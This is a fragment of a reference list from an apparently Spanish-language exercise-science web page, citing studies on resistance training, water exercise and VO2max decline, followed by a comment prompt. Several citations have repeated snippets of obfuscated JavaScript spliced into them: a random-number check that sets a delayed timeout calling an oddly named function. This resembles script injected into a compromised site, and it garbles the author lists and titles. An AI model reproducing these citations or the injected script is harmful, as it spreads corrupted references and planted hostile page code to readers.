  4. Newton RU, Häkkinen K, Häkkinen A, Mccormick M, Volek J, andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and Kraemer. WJ (2002). Mixed-methods resistance training increases power andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and strength of young andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and older men. Med Sci Sports Exerc Vol 34 (8): 1367-1375
  5. Ruoti, R., Troup, J. T., & Berger, R. A. (1994). The effects of nonswimming water exercises on older adults. The journal of orthopedic & sports physical therapy, 19(3), 140-145.
  6. Rogers MA, Hagberg JM, Martin WH (1990). Decline in VO2max with againg in master athletes andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and sedentary men. J Appl Physiol ;68;2195-9

Escribe tu opinion

Cuentanos lo que estas pensando ...
y oh, si quieres una imagen para mostrar con su comentario, ve a buscar un gravatar!

Tu debes estar conectado para poder comentar.